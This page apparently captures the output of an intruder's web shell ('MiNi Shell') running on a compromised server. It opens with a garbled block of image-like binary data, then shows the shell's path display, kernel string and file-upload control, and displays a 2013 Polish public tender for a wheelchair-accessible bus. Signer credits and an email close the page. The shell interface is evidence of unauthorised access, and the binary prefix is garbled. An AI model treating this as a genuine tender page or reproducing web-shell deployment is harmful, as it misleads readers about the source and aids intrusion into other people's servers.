JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130116/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130116/22830-N-2013.html

<p class="kh_header"><b>Stegna: ZAKUP SAMOCHODU   9-CIO  OSOBOWEGO TYPU BUS PRZYSTOSOWANEGO DO PRZEWOŻENIA OSÓB NIEPEŁNOSPRAWNYCH</b><br>
<b>Numer ogłoszenia: 22830 - 2013; data zamieszczenia: 16.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej , ul. Morska 11, 82-103 Stegna, woj. pomorskie, tel. 055 2478384, faks -55 2478205.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dpsmors.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa samorządu powiatowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZAKUP SAMOCHODU   9-CIO  OSOBOWEGO TYPU BUS PRZYSTOSOWANEGO DO PRZEWOŻENIA OSÓB NIEPEŁNOSPRAWNYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I Przedmiot zamówienie  dotyczy dostawy fabrycznie nowego (rok produkcji 2013r.) samochodu w ilości szt.1, 9-osobowego typu BUS przystosowanego do przewożenia osób niepełnosprawnych,  z  możliwością przewożenia jednej osoby niepełnosprawnej na wózku inwalidzkim .
2.Spełniający wymagania techniczne określone przez obowiązujące w Polsce przepisy  dla pojazdów poruszających się po drogach publicznych, w tym warunki techniczne wynikające z ustawy z dnia 20 czerwca 1997r. Prawo o ruchu drogowym(tekst jednolity Dz. U. z 2005r. nr 108, poz. 908  z późn. zm.) oraz rozporządzeń wykonawczych  do tej ustawy .
3.Mający homologację , wystawioną zgodnie z art. 68 ustawy  -Prawo o ruchu drogowym.
4.Spełniający wymogi -minimum Dyrektywy CEE EURO 5(2007/715/EC) w zakresie emisji spalin.Rozstaw osi co najmniej 3300 mm,silnik diesel z wtryskiem bezpośrednim o pojemności  minimum 1,9  cm3, mocy minimum 100 KM,wymiary: długość minimum 5180mm,pojemność zbiornika paliwa minimum 80 litrów, manualna skrzynia biegów -6 biegowa,ABS  z układem wspomaganie nagłego hamowania, System kontroli toru jazdy  ESP połączony z układem antypoślizgowym ASR lub równoważny, wspomaganie układu kierowniczego,lakier zwykły -  niemetalizowany , (oprócz koloru białego) uzgodniony po wyborze oferty w umowie, przeszklone boki nadwozia,przesuwne drzwi boczne przeszklone z otwieraną szyba, centralny elektryczny zamek wszystkich drzwi, drzwi tylne z szybą ogrzewaną , wycieraczką i spryskiwaczem otwierane pod katem 180  stopni, stopień wejściowy boczny oświetlony,oświetlenie w podsufitce+ gniazdo 12V w kabinie, szyba przesuwana w drugim rzędzie siedzeń, światła przeciwmgłowe-przód, fotel  kierowcy z regulacją  wysokości , regulacją  przód-tył i kąta położenia: podwójne siedzenie obok kierowcy, regulacja położenia kierownicy,fotele niezależne w 2 i 3 rzędzie siedzeń, tapicerka foteli -materiałowa,zagłówki na wszystkich siedzeniach z regulowaną wysokością, pasy bezpieczeństwa na wszystkich siedzeniach, poduszka powietrzna min.2szt., układ blokady zapłonu  (immobiliser)  oraz alarm antywłamaniowy honorowany przez firmy  ubezpieczeniowe, rozbudowana klimatyzacja  na tylną część pojazdu (2 i 3 rząd) + dodatkowe ogrzewanie, pakiet elektryczny (lusterka i szyby elektryczne), ogrzewanie zamkniętym obiegiem powietrza, Instalacja radiowa z anteną zewnętrzną, boczne listwy ochronne, czujnik parkowania tył, hak holowniczy,trójkąt ostrzegawczy, gaśnica, apteczka, pełnowymiarowe koło zapasowe, kamizelki odblaskowe -min.2 szt., linka holownicza,  dodatkowy kpl kół zimowych/letnich (4 felgi wraz ze zmontowanymi oponami zimowymi/letnimi),radioodtwarzacz CD MP3 z wejściem analogowym i USB, z satelitą sterującym  przy kierownicy + 4 głośniki + 2 Tweetery, 

II.Minimalne parametry eksploatacyjne pojazdu:
1.zużycie paliwa nie większe niż 0,085l/1km-mierzone w cyklu mieszanym -wartość uśredniona 
2.zużycie energii nie więcej niż   3,10 MJ/km
3.wielkość emisji dwutlenku węgla ( w jednostkach g/km)--zgodnie z normą EURO 5 
4.łączna  wielkość emisji tlenków azotu, węglowodorów i cząstek stałych
w jednostkach g/km -zgodnie z normą Euro 5. 
Normy EURO 5 g/km :
- tlenku węgla (CO)    nie więcej niż  0,5  g/km 
- węglowodorów (HC) nie więcej niż 0,05 g/km 
- tlenków azotu (NOx) nie więcej niż 0,18  g/km 
-cząstek stałych (PM)nie więcej niż 0,005g/km 
III. Wymagania w zakresie zabudowy i wyposażenia pojazdu przystosowanego do przewozu osób niepełnosprawnych  w  tym jednej osoby  na wózku inwalidzkim:
1.Zamontowanie w tylnej części pojazdu w 2 i 3 rzędzie niezależnych foteli indywidualnych posiadających regulację oparcia, zagłówki  oraz 3 punktowe  pasy bezpieczeństwa. Możliwość demontażu wszystkich foteli ,
2.pokrycie podłogi wykładziną anty-poślizgową.
3.zamontowanie szyn podłogowych do mocowania wózka inwalidzkiego 
4.zamontowanie dodatkowych kierunkowskazów w tylnej części pojazdu (światła awaryjne) wymóg oznakowania podczas wprowadzania osoby niepełnosprawnej.
5.wyposażenie  do przewozu osoby niepełnosprawnej:
-atestowane mocowanie dla jednego wózka inwalidzkiego (wózek montowany  zamiennie  ze środkowym  fotelem III rzędu
-pasy do mocowania osoby niepełnosprawnej,
-pasy do mocowania wózka inwalidzkiego,
-najazdy dwu-częściowe z bieżnią anty-poślizgową  do wprowadzania osób na  wózku  inwalidzkim, 
6.oznakowanie pojazdu zgodne z przepisami  o ruchu drogowym ,oklejenie samochodu emblematami informującymi o przewozie osób niepełnosprawnych,ostrzegawcze kierunkowskazy dachowe. 
IV. Warunki dotyczące odbioru  i serwisu pojazdu:
1.Wykonawca zapewni odbiór pojazdu oraz serwis pojazdu w odległości  do 60 km  od miejscowości Stegna.
2.Samochód powinien wskazywać taki stan baku, aby światło rezerwy nie było zapalone.
3.Wykonawca zobowiązany będzie dołączyć do pojazdu  komplet dokumentów: karta pojazdu, karta gwarancyjna, instrukcja obsługi w języku  polskim oraz inne wymagane prawem dokumenty pojazdu (wyciąg ze świadectwa homologacji pojazdu, sporządzony w języku polskim dokument potwierdzający spełnienie normy emisji spalin) 
V.Wymagania organizacyjne
1.Wykonawca  odpowiedzialny jest za całokształt, w tym za przebieg oraz terminowe wykonanie zamówienia  do czasu wygaśnięcia zobowiązań Wykonawcy wobec zamawiającego.
2. Wykonawca zapewnia możliwość nieodpłatnego korzystania z samochodu zastępczego w przypadku przestoju serwisowego samochodu
VI. Wymagania dot. gwarancji
Gwarancja minimum  
1. 24 miesięczna gwarancja mechaniczna na cały pojazd; 
2. 36 miesięczna gwarancja  na powłokę lakierniczą; 
3. 144 miesięczna gwarancja fabryczna na perforację nadwozia.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 34.11.52.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień
Ocena spełniania wyżej opisanych warunków udziału w postępowaniu dokonana będzie w oparciu o dokumenty określone w pkt VI siwz metodą warunku granicznego(spełnia/nie spełnia)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie wyznacza szczegółowego warunku w tym zakresie
Ocena spełniania wyżej opisanych warunków udziału w postępowaniu dokonana będzie w oparciu o dokumenty określone w pkt VI siwz metodą warunku granicznego(spełnia/nie spełnia)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie wyznacza szczegółowego warunku w tym zakresie
Ocena spełniania wyżej opisanych warunków udziału w postępowaniu dokonana będzie w oparciu o dokumenty określone w pkt VI siwz metodą warunku granicznego(spełnia/nie spełnia)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie wyznacza szczegółowego warunku w tym zakresie
Ocena spełniania wyżej opisanych warunków udziału w postępowaniu dokonana będzie w oparciu o dokumenty określone w pkt VI siwz metodą warunku granicznego(spełnia/nie spełnia)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie wyznacza szczegółowego warunku w tym zakresie
Ocena spełniania wyżej opisanych warunków udziału w postępowaniu dokonana będzie w oparciu o dokumenty określone w pkt VI siwz metodą warunku granicznego(spełnia/nie spełnia)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Karta opisowa pojazdu potwierdzająca spełnienie wymagań określonych przez zamawiającego.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Postanowienia umowy zawarto w projekcie umowy,który stanowi załącznik numer 5 do siwz.Dopuszczalne zmiany  postanowień umowy oraz określenie warunków zmian.
1.Inicjatorem zmiany może być zarówno Zamawiający jak i Wykonawca.
2.warunkiem dokonania zmiany umowy jest złożenie pisemnego wniosku przez stronę inicjującą  zawierająca opis propozycji zmiany oraz jej uzasadnienie(przyczynę), opis wpływu zmiany na wykonanie zamówienia.
3.Zmana umowy na podstawie art.144 Ustawy Prawo zamówień publicznych w sprawie zamówienia publicznego w stosunku do treści oferty , na podstawie której dokonano wyboru  wykonawcy może być spowodowana:
a) w wyniku zmiany przepisów prawa,
b) zmianą numerów rachunków bankowych stron umowy,
c)zmiana umownego terminu wykonania przedmiotu zamówienia z powodu braku możliwości  dostarczenia przedmiotu umowy na skutek obiektywnych warunków klimatycznych lub działania siły wyższej w rozumieniu Kodeksu cywilnego,
4. zmiany umowy wymagają  zachowania formy pisemnej pod rygorem nieważności w postaci aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dpsmors.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej MORS
ul. Morska 11
82-103 Stegna.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.01.2013 godzina 11:45, miejsce: Dom Pomocy Społecznej MORS
ul. Morska 11
82-103 Stegna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com